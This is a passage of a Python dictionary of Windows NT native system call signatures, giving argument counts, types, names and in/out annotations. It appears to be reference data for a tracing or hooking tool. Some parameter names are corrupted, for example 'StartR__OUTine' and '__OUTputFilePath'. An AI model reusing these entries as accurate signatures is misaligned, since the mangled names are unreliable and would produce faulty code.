'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['ParentPartitionHandle', 'PartitionHandle', 'DesiredAccess', 'ObjectAttributes', 'PreferredNode'], 'NTSTATUS', ['__IN_', None, '__IN_', '__IN_opt_', '__IN_']), 'NtOpenPartition': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['PartitionHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, '__IN_', '__IN_']), 'NtManagePartition': (5, ['HANDLE', 'HANDLE', 'PARTITION__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TargetHandle', 'SourceHandle', 'PartitionInformationClass', 'PartitionInformation', 'PartitionInformationLength'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', None, '__IN_']), 'NtMapUserPhysicalPages': (3, ['PVOID', 'ULONG_PTR', 'PULONG_PTR'], ['VirtualAddress', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN_', '__IN_', None]), 'NtAllocateUserPhysicalPagesEx': (5, ['HANDLE', 'PULONG_PTR', 'PULONG_PTR', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['ProcessHandle', 'NumberOfPages', 'UserPfnArray', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', ['__IN_', '__IN_OUT_', None, None, '__IN_']), 'NtGetWriteWatch': (7, ['HANDLE', 'ULONG', 'PVOID', 'SIZE_T', 'PVOID', 'PULONG_PTR', 'PULONG'], ['ProcessHandle', 'Flags', 'BaseAddress', 'RegionSize', '*UserAddressArray', 'EntriesInUserAddressArray', 'Granularity'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_', None, '__IN_OUT_', None]), 'NtResetWriteWatch': (3, ['HANDLE', 'PVOID', 'SIZE_T'], ['ProcessHandle', 'BaseAddress', 'RegionSize'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_']), 'NtCreatePagingFile': (4, ['PUNICODE_STRING', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'ULONG'], ['PageFileName', 'MinimumSize', 'MaximumSize', 'Priority'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_']), 'NtCancelIoFileEx': (3, ['HANDLE', 'PIO_STATUS_BLOCK', 'PIO_STATUS_BLOCK'], ['FileHandle', 'IoRequestToCancel', 'IoStatusBlock'], 'NTSTATUS', ['__IN_', '__IN_opt_', None]), 'NtCancelWaitCompletionPacket': (2, ['HANDLE', 'BOOLEAN'], ['WaitCompletionPacketHandle', 'RemoveSignaledPacket'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtCreateWaitCompletionPacket': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['WaitCompletionPacketHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, '__IN_', '__IN_opt_']), 'NtCompareObjects': (2, ['HANDLE', 'HANDLE'], ['Handle', 'Handle2'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtCompareTokens': (3, ['HANDLE', 'HANDLE', 'PBOOLEAN'], ['FirstTokenHandle', 'SecondTokenHandle', 'Equal'], 'NTSTATUS', ['__IN_', '__IN_', None]), 'NtContinueEx': (2, ['PCONTEXT', 'PKCONTINUE_ARGUMENT'], ['ContextRecord', 'ContinueArgument'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtCreateCrossVmEvent': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'PGUID'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes', 'Unknown', 'Unknown', 'Guid'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, None, '__IN']), 'NtCreateCrossVmMutant': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'PGUID'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes', 'Unknown', 'Unknown', 'Guid'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, None, '__IN']), 'NtCreateDirectoryObjectEx': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'ULONG'], ['DirectoryHandle', 'DesiredAccess', 'ObjectAttributes', 'ShadowDirectoryHandle', 'Flags'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtCreateIRTimer': (2, ['PHANDLE', 'ACCESS_MASK'], ['TimerHandle', 'DesiredAccess'], 'NTSTATUS', ['__OUT', '__IN']), 'NtCreateLowBoxToken': (9, ['PHANDLE', 'HANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PSID', 'DWORD', 'PSID_AND_ATTRIBUTES', 'DWORD', 'PVOID'], ['LowBoxToken', 'hOrgToken', 'DesiredAccess', 'ObjectAttributes', 'AppContainerSid', 'CapabilityCount', 'Capabilities', 'LowBoxCount', 'LowBoxStruct'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtCreateRegistryTransaction': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['RegistryHandle', 'DesiredAccess', 'ObjectAttributes', 'Flags'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtCreateThreadEx': (11, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'PVOID', 'PVOID', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'PVOID'], ['ThreadHandle', 'DesiredAccess', 'ObjectAttributes', 'ProcessHandle', 'StartR__OUTine', 'Argument', 'CreateFlags', 'ZeroBits', 'StackSize', 'MaximumStackSize', 'AttributeList'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtCreateTimer2': (5, ['PHANDLE', 'PVOID', 'POBJECT_ATTRIBUTES', 'ULONG', 'ACCESS_MASK'], ['TimerHandle', 'Unknown1', 'ObjectAttributes', 'Attributes', 'DesiredAccess'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN_opt', '__IN', '__IN']), 'NtCreateTokenEx': (17, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'TOKEN_TYPE', 'PLUID', 'PLARGE_INTEGER', 'PTOKEN_USER', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_GROUPS', 'PTOKEN_MANDATORY_POLICY', 'PTOKEN_OWNER', 'PTOKEN_PRIMARY_GROUP', 'PTOKEN_DEFAULT_DACL', 'PTOKEN_SOURCE'], ['TokenHandle', 'DesiredAccess', 'ObjectAttributes', 'TokenType', 'AuthenticationId', 'ExpirationTime', 'User', 'Groups', 'Privileges', 'UserAttributes', 'DeviceAttributes', 'DeviceGroups', 'TokenMandatoryPolicy', 'Owner', 'PrimaryGroup', 'DefaultDacl', 'TokenSource'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__IN']), 'NtCreateUserProcess': (11, ['PHANDLE', 'PHANDLE', 'ACCESS_MASK', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG', 'PRTL_USER_PROCESS_PARAMETERS', 'PVOID', 'PVOID'], ['ProcessHandle', 'ThreadHandle', 'ProcessDesiredAccess', 'ThreadDesiredAccess', 'ProcessObjectAttributes', 'ThreadObjectAttributes', 'ProcessFlags', 'ThreadFlags', 'ProcessParameters', 'CreateInfo', 'AttributeList'], 'NTSTATUS', ['__OUT', '__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_OUT', '__IN_opt']), 'NtCreateWaitablePort': (5, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG', 'ULONG'], ['PortHandle', 'ObjectAttributes', 'MaxConnectionInfoLength', 'MaxMsgLength', 'MaxPoolUsage'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtCreateWnfStateName': (7, ['PCWNF_STATE_NAME', 'ULONG', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'PSECURITY_DESCRIPTOR'], ['StateName', 'Lifetime', 'DataScope', 'PersistData', 'TypeId', 'MaximumStateSize', 'SecurityDescriptor'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN']), 'NtDebugContinue': (3, ['HANDLE', 'PCLIENT_ID', 'NTSTATUS'], ['DebugHandle', 'ClientId', 'Status'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtDeleteBootEntry': (1, ['PUNICODE_STRING'], ['Name'], 'NTSTATUS', ['__IN']), 'NtDeleteDriverEntry': (1, ['PUNICODE_STRING'], ['Name'], 'NTSTATUS', ['__IN']), 'NtDeleteWnfStateData': (2, ['PCWNF_STATE_NAME', 'PVOID'], ['StateName', 'ExplicitScope'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtDeleteWnfStateName': (1, ['PCWNF_STATE_NAME'], ['StateName'], 'NTSTATUS', ['__IN']), 'NtDirectGraphicsCall': (5, ['ULONG', 'ULONG', 'ULONG', 'ULONG', 'ULONG'], ['Unknown', 'Unknown', 'Unknown', 'Unknown', 'Unknown'], 'NTSTATUS', [None, None, None, None, None]), 'NtFilterBootOption': (5, ['ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['FilterOperation', 'ObjectType', 'ElementType', 'Data', 'DataSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN']), 'NtFilterToken': (6, ['HANDLE', 'ULONG', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_GROUPS', 'PHANDLE'], ['ExistingTokenHandle', 'Flags', 'SidsToDisable', 'PrivilegesToDelete', 'RestrictedSids', 'NewTokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT']), 'NtFilterTokenEx': (14, ['HANDLE', 'ULONG', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_GROUPS', 'ULONG', 'PUNICODE_STRING', 'ULONG', 'PUNICODE_STRING', 'PTOKEN_GROUPS', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_GROUPS', 'PHANDLE'], ['TokenHandle', 'Flags', 'SidsToDisable', 'PrivilegesToDelete', 'RestrictedSids', 'DisableUserClaimsCount', 'UserClaimsToDisable', 'DisableDeviceClaimsCount', 'DeviceClaimsToDisable', 'DeviceGroupsToDisable', 'RestrictedUserAttributes', 'RestrictedDeviceAttributes', 'RestrictedDeviceGroups', 'NewTokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT']), 'NtGetCachedSigningLevel': (6, ['HANDLE', 'PULONG', 'PBYTE', 'PUCHAR', 'PULONG', '__opt'], ['File', 'Flags', 'SigningLevel', 'Thumbprint', 'ThumbprintSize', 'PULONG'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__OUT', '__IN_OUT_opt', None]), 'NtGetCompleteWnfStateSubscription': (6, ['PWNF_STATE_NAME', 'PULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['OldDescriptorStateName', 'OldSubscriptionId', 'OldDescriptorEventMask', 'OldDescriptorStatus', 'NewDeliveryDescriptor', 'DescriptorSize'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN']), 'NtGetContextThread': (2, ['HANDLE', 'PCONTEXT'], ['ThreadHandle', 'pContext'], 'NTSTATUS', ['__IN', '__OUT']), 'NtGetCurrentProcessorNumber': (0, [], [], 'ULONG', []), 'NtGetCurrentProcessorNumberEx': (1, ['__opt'], ['PULONG'], 'NTSTATUS', [None]), 'NtGetDevicePowerState': (2, ['HANDLE', 'PDEVICE_POWER_STATE'], ['DeviceHandle', 'State'], 'NTSTATUS', ['__IN', '__OUT']), 'NtImpersonateAnonymousToken': (1, ['HANDLE'], ['THreadHandle'], 'NTSTATUS', ['__IN']), 'NtInitializeRegistry': (1, ['ULONG'], ['Options'], 'NTSTATUS', ['__IN']), 'NtInitiatePowerAction': (4, ['POWER_ACTION', 'SYSTEM_POWER_STATE', 'ULONG', 'BOOLEAN'], ['Action', 'State', 'Flags', 'Asynch'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtIsSystemResumeAutomatic': (0, [], [], 'NTSTATUS', []), 'NtLoadKeyEx': (8, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG', 'HANDLE', 'PVOID', 'PVOID', 'PVOID', 'PIO_STATUS_BLOCK'], ['TargetKey', 'SourceFile', 'Flags', 'TrustClassKey', 'Reserved', 'ObjectContext', 'CallbackReserved', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN', '__IN', '__OUT']), 'NtLockProductActivationKeys': (2, ['PULONG', 'PULONG'], ['ProductBuild', 'SafeMode'], 'NTSTATUS', ['__IN', '__IN']), 'NtLockRegistryKey': (1, ['HANDLE'], ['KeyHandle'], 'NTSTATUS', ['__IN']), 'NtMakePermanentObject': (1, ['HANDLE'], ['Object'], 'NTSTATUS', ['__IN']), 'NtManageHotPatch': (4, ['ULONG', 'PULONGLONG', 'ULONG', 'PVOID'], ['Unknown', 'Unknown', 'Unknown', 'Unknown'], 'NTSTATUS', [None, None, None, None]), 'NtMapCMFModule': (6, ['ULONG', 'ULONG', '__opt', '__opt', '__opt', '__opt'], ['What', 'Index', 'PULONG', 'PULONG', 'PULONG', 'PPVOID'], 'NTSTATUS', ['__IN', '__IN', None, None, None, None]), 'NtModifyBootEntry': (1, ['PBOOT_ENTRY'], ['BootEntry'], 'NTSTATUS', ['__IN']), 'NtModifyDriverEntry': (1, ['PDRIVER_ENTRY'], ['DriverEntry'], 'NTSTATUS', ['__IN']), 'NtNotifyChangeDirectoryFileEx': (10, ['HANDLE', 'HANDLE', 'PIO_APC_R__OUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'ULONG', 'BOOLEAN', 'DIRECTORY_NOTIFY__INFORMATION_CLASS'], ['FileHandle', 'Event', 'ApcR__OUTine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'CompletionFilter', 'WatchTree', 'DirectoryNotifyInformationClass'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_opt_', '__IN_opt_', None, None, '__IN_', '__IN_', '__IN_', '__IN_opt_']), 'NtNotifyChangeMultipleKeys': (12, ['HANDLE', 'ULONG', 'POBJECT_ATTRIBUTES', 'HANDLE', 'PIO_APC_R__OUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'BOOLEAN', '__opt', 'ULONG', 'BOOLEAN'], ['MasterKeyHandle', 'Count', 'SubordinateObjects', 'Event', 'ApcR__OUTine', 'ApcContext', 'IoStatusBlock', 'CompletionFilter', 'WatchTree', 'PVOID', 'BufferSize', 'Asynchronous'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', None, '__IN', '__IN']), 'NtOpenKeyEx': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtOpenKeyedEvent': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['KeyedEventHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtOpenRegistryTransaction': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['RegistryHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtPlugPlayControl': (3, ['ULONG', 'PVOID', 'ULONG'], ['Class', 'Buffer', 'BufferSize'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN']), 'NtPssCaptureVaSpaceBulk': (5, ['HANDLE', 'PVOID', 'PVOID', 'SIZE_T', 'PSIZE_T'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'Length', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtQueryAuxiliaryCounterFrequency': (1, ['PULONGLONG'], ['lpAuxiliaryCounterFrequency'], 'NTSTATUS', ['__OUT']), 'NtQueryDebugFilterState': (2, ['ULONG', 'ULONG'], ['Component', 'Level'], 'NTSTATUS', ['__IN', '__IN']), 'NtQueryInformationByName': (5, ['POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE__INFORMATION_CLASS'], ['ObjectAttributes', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtQueryInstallUILanguage': (1, ['PULONG'], ['LanguageId'], 'NTSTATUS', ['__OUT']), 'NtQueryLicenseValue': (5, ['PUNICODE_STRING', 'PULONG', 'PVOID', 'ULONG', 'PULONG'], ['Name', 'Type', 'Buffer', 'Length', 'ReturnedLength'], 'NTSTATUS', ['__IN', '__OUT_opt', '__OUT', '__IN', '__OUT']), 'NtQueryOpenSubKeys': (2, ['POBJECT_ATTRIBUTES', 'PULONG'], ['TargetKey', 'HandleCount'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryOpenSubKeysEx': (4, ['POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'PULONG'], ['TargetKey', 'BufferLength', 'Buffer', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__OUT']), 'NtQueryPortInformationProcess': (0, [], [], 'NTSTATUS', []), 'NtQuerySecurityPolicy': (6, ['PUNICODE_STRING', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PULONG', 'PBOOLEAN', 'PULONG'], ['Category', 'SubCategory', 'Policy', 'Unknown', 'Enabled', 'Subsystem'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_OUT', '__OUT', '__IN']), 'NtQueryWnfStateNameInformation': (5, ['PCWNF_STATE_NAME', 'ULONG', 'PVOID', 'PVOID', 'ULONG'], ['StateName', 'NameInfoClass', 'ExplicitScope', 'InfoBuffer', 'InfoBufferSize'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__OUT', '__IN']), 'NtRenameKey': (2, ['HANDLE', 'PUNICODE_STRING'], ['KeyHandle', 'ReplacementName'], 'NTSTATUS', ['__IN', '__IN']), 'NtResumeProcess': (1, ['HANDLE'], ['hProcess'], 'NTSTATUS', ['__IN']), 'NtRevertContainerImpersonation': (0, [], [], 'NTSTATUS', []), 'NtRollbackRegistryTransaction': (2, ['HANDLE', 'BOOL'], ['RegistryHandle', 'Wait'], 'NTSTATUS', [None, None]), 'NtSaveKeyEx': (3, ['HANDLE', 'HANDLE', 'ULONG'], ['KeyHandle', 'FileHandle', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSaveMergedKeys': (3, ['HANDLE', 'HANDLE', 'HANDLE'], ['HighPrecedenceKeyHandle', 'LowPrecedenceKeyHandle', 'FileHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSecureConnectPort': (9, ['PHANDLE', 'PUNICODE_STRING', 'ULONG', 'PPORT_VIEW', 'PSID', 'PREMOTE_PORT_VIEW', 'PULONG', 'PVOID', 'PULONG'], ['PortHandle', 'Name', 'QOS', 'pSectionInfo', 'SecurityInfo', 'pSectionMapInfo', 'MaxMsgLength', 'ConnectData', 'ConnectDataLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN_OUT', '__IN', '__IN_OUT', '__OUT', '__IN_OUT_opt', '__IN_OUT_opt']), 'NtSetBootOptions': (2, ['PVOID', 'ULONG'], ['Buffer', 'BufferLength'], 'NTSTATUS', ['__IN', '__IN']), 'NtSetCachedSigningLevel': (5, ['ULONG', 'BYTE', 'PHANDLE', 'ULONG', 'HANDLE'], ['Flags', 'InputSigningLevel', 'SourceFiles', 'SourceFileCount', 'TargetFile'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtSetCachedSigningLevel2': (6, ['ULONG', 'BYTE', 'PHANDLE', 'ULONG', 'HANDLE', 'PVOID'], ['Flags', 'InputSigningLevel', 'SourceFiles', 'SourceFileCount', 'TargetFile', 'LevelInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt']), 'NtSetContextThread': (2, ['HANDLE', 'PCONTEXT'], ['ThreadHandle', 'pContext'], 'NTSTATUS', ['__IN', '__IN']), 'NtSetDebugFilterState': (3, ['ULONG', 'ULONG', 'BOOLEAN'], ['Component', 'Level', 'State'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSetDefaultUILanguage': (1, ['ULONG'], ['LanguageId'], 'NTSTATUS', ['__IN']), 'NtSetIRTimer': (2, ['HANDLE', 'PLARGE_INTEGER'], ['TimerHandle', 'Time'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtSetInformationDebugObject': (5, ['HANDLE', 'DEBUGOBJECTINFOCLASS', 'PVOID', 'ULONG', 'PULONG'], ['DebugHandle', 'Class', 'Buffer', 'Length', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt']), 'NtSetInformationSymbolicLink': (4, ['HANDLE', 'ULONG', 'PVOID', 'ULONG'], ['Handle', 'Class', 'Buffer', 'BufferLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetLdtEntries': (6, ['ULONG', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'ULONG'], ['Selector1', 'LdtEntry1L', 'LdtEntry1H', 'Selector2', 'LdtEntry2L', 'LdtEntry2H'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtSetSystemEnvironmentValueEx': (5, ['PUNICODE_STRING', 'PVOID', 'PVOID', 'ULONG', 'ULONG'], ['Name', 'Guid', 'Buffer', 'BufferLength', 'Attributes'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN']), 'NtSetSystemPowerState': (3, ['POWER_ACTION', 'SYSTEM_POWER_STATE', 'ULONG'], ['Action', 'State', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSetThreadExecutionState': (2, ['ULONG', 'PULONG'], ['State', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT']), 'NtSetUuidSeed': (1, ['PUCHAR'], ['UuidSeed'], 'NTSTATUS', ['__IN']), 'NtSubscribeWnfStateChange': (4, ['PCWNF_STATE_NAME', 'ULONG', 'ULONG', '__opt'], ['StateName', 'ChangeStamp', 'EventMask', 'PULONG'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', None]), 'NtSuspendProcess': (1, ['HANDLE'], ['ProcessHandle'], 'NTSTATUS', ['__IN']), 'NtTranslateFilePath': (4, ['PVOID', 'ULONG', 'PVOID', 'ULONG'], ['InputPath', '__OUTputType', '__OUTputFilePath', '__OUTputFilePathLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN']), 'NtUnloadKey2': (2, ['POBJECT_ATTRIBUTES', 'ULONG'], ['TargetKey', 'Flags'], 'NTSTATUS', ['__IN', '__IN']), 'NtUnloadKeyEx': (2, ['POBJECT_ATTRIBUTES', 'HANDLE'], ['TargetKey', 'Event'], 'NTSTATUS', ['__IN', '__IN']), 'NtUnsubscribeWnfStateChange': (1, ['PCWNF_STATE_NAME'], ['StateName'], 'NTSTATUS', ['__IN']), 'NtVdmControl': (2, ['ULONG', 'PVOID'], ['ControlCode', 'ControlData'], 'NTSTATUS', ['__IN', '__IN']), 'NtWaitForAlertByThreadId': (2, ['HANDLE', 'PLARGE_INTEGER'], ['Handle', 'Time_Out'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtWaitForDebugEvent': (4, ['HANDLE', 'BOOLEAN', 'PLARGE_INTEGER', 'PULONG'], ['DebugHandle', 'Alertable', 'Time_Out', 'Result'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__OUT']), 'NtLoadKey3': (8, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'ULONG', 'ACCESS_MASK', 'HANDLE', 'ULONG'], ['KeyObjectAttributes', 'FileObjectAttributes', 'Flags', 'LoadArguments', 'LoadArgumentCount', 'DesiredAccess', 'KeyHandle', 'Unkown'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtAlpcConnectPort': (11, ['PHANDLE', 'PUNICODE_STRING', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES', 'ULONG', 'PSID', 'PPORT_MESSAGE', 'PULONG', 'PALPC_MESSAGE_ATTRIBUTES', 'PALPC_MESSAGE_ATTRIBUTES', 'PLARGE_INTEGER'], ['PortHandle', 'PortName', 'ObjectAttributes', 'PortAttributes', 'Flags', 'RequiredServerSid', 'ConnectionMessage', 'BufferLength', '__OUTMessageAttributes', '__INMessageAttributes', 'Time_Out'], 'NTSTATUS', [None, '__IN_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_opt_', None, '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_opt_']), 'NtCancelDeviceWakeupRequest': (1, ['HANDLE'], ['Device'], 'NTSTATUS', ['__IN_']), 'NtCreateChannel': (2, ['PHANDLE', 'POBJECT_ATTRIBUTES'], ['ChannelHandle', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN_opt']), 'NtFreeUserPhysicalPages': (3, ['HANDLE', 'PULONG', 'PULONG'], ['ProcessHandle', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT']), 'NtGetPlugPlayEvent': (4, ['PPLUGPLAY_APC_R__OUTINE', 'PVOID', 'PPLUGPLAY_EVENT_BLOCK', 'ULONG'], ['PnPApcR__OUTine', 'PnPContext', 'PnPEvent', 'EventBufferLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN']), 'NtOpenChannel': (2, ['PHANDLE', 'POBJECT_ATTRIBUTES'], ['ChannelHandle', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN']), 'NtReplyWaitSendChannel': (3, ['PVOID', 'ULONG', 'PCHANNEL_MESSAGE'], ['Text', 'Length', '*Message'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtSendWaitReplyChannel': (4, ['HANDLE', 'PVOID', 'ULONG', 'PCHANNEL_MESSAGE'], ['ChannelHandle', 'Text', 'Length', '*Message'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtSetContextChannel': (1, ['PVOID'], ['Context'], 'NTSTATUS', ['__IN']), 'NtRequestDeviceWakeup': (1, ['HANDLE'], ['Device'], 'NTSTATUS', ['__IN']), 'NtRequestWakeupLatency': (1, ['LATENCY_TIME'], ['latency'], 'NTSTATUS', ['__IN']), 'NtW32Call': (5, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'PULONG'], ['ApiNumber', 'InputBuffer', 'InputLength', '*__OUTputBuffer', '__OUTputLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__OUT']), 'KiUserApcDispatcher': (5, ['PVOID', 'PVOID', 'PVOID', 'PVOID', 'PVOID'], ['Unused1', 'Unused2', 'Unused3', 'ContextStart', 'ContextBody'], 'VOID', ['__IN', '__IN', '__IN', '__IN', '__IN']), 'NtAlertThread': (1, ['HANDLE'], ['ThreadHandle'], 'NTSTATUS', ['__IN']), 'NtCallbackReturn': (3, ['PVOID', 'ULONG', 'NTSTATUS'], ['Result', 'ResultLength', 'Status'], 'NTSTATUS', ['__IN_opt', '__IN', '__IN']), 'NtQueueApcThread': (5, ['HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG'], ['ThreadHandle', 'ApcRoutine', 'ApcRoutineContext', 'ApcStatusBlock', 'ApcReserved'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtTestAlert': (0, [], [], 'NTSTATUS', []), 'NtAddAtom': (2, ['PWCHAR', 'PRTL_ATOM'], ['AtomName', 'Atom'], 'NTSTATUS', ['__IN', '__OUT']), 'NtDeleteAtom': (1, ['RTL_ATOM'], ['Atom'], 'NTSTATUS', ['__IN']), 'NtFindAtom': (2, ['PWCHAR', 'PRTL_ATOM'], ['AtomName', 'Atom'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtQueryInformationAtom': (5, ['RTL_ATOM', 'ATOM_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['Atom', 'AtomInformationClass', 'AtomInformation', 'AtomInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', 